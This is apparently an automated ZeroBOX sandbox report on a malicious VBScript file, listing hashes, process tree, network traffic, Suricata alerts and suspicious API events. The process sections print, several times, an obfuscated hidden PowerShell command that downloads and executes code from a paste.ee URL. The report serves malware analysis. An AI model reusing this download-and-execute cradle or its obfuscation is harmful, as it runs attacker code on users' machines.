Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 29, 2024, 5:03 p.m.	July 29, 2024, 5:05 p.m.

Size	8.3KB
Type	ASCII text, with CRLF line terminators
MD5	`8b2d2b9a6d36abcb2b1b8a60f9898374`
SHA256	`dafd3a15f6a974dc3409aa3179bd9b3b699ae7ba180a261a07ee98490486a43b`
CRC32	`3974AB2C`
ssdeep	`192:GiFSTRuYgmY9CfjdUxdNGwpw3xb4FK+F8S7jXsaBZPk+oyRcaMu+JNeit194AM8B:Z8wnK`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\vnm2.txt.vbs
840
- cmd.exe "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2084
  - powershell.exe POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    2168

Name	Response	Post-Analysis Lookup
paste.ee	A 104.21.84.67 A 172.67.187.200	104.21.84.67

IP Address	Status	Action
104.21.84.67	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2054041	ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)	Misc activity
TCP 192.168.56.103:49165 -> 104.21.84.67:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation
TCP 192.168.56.103:49165 -> 104.21.84.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49165 104.21.84.67:443	C=US, O=Google Trust Services, CN=WE1	CN=paste.ee	db:ac:96:3c:aa:07:4d:6f:90:48:a6:34:79:1d:71:cf:4d:ef:d9:c2

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2024, 5:03 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 29, 2024, 5:03 p.m.			0	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: Invoke-Expression : The '<' operator is reserved for future use. console_handle: 0x0000003f	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: At line:1 char:4 console_handle: 0x0000004b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: + IeX <<<< (NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://paste.ee/d/Cyxef/ console_handle: 0x00000057	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: + CategoryInfo : ParserError: (<:OperatorToken) [Invoke-Expressio console_handle: 0x0000006f	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: n], ParseException console_handle: 0x0000007b	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Com console_handle: 0x00000087	1	1
WriteConsoleW July 29, 2024, 5:03 p.m.	buffer: mands.InvokeExpressionCommand console_handle: 0x00000093	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003118d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003118d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003118d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003110d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003110d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003110d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003110d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003110d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003110d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003118d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003118d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003118d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311e58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00311c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc0a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc0a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc0a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc0a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc0a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2024, 5:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05fc0a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 29, 2024, 5:03 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://paste.ee/d/Cyxef/0

Performs some HTTP requests (1 event)

request

GET https://paste.ee/d/Cyxef/0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02660000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72681000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72682000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02452000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02761000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02463000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02464000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0245b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02465000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02466000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02493000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02494000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02495000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02496000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02498000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02499000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2024, 5:03 p.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
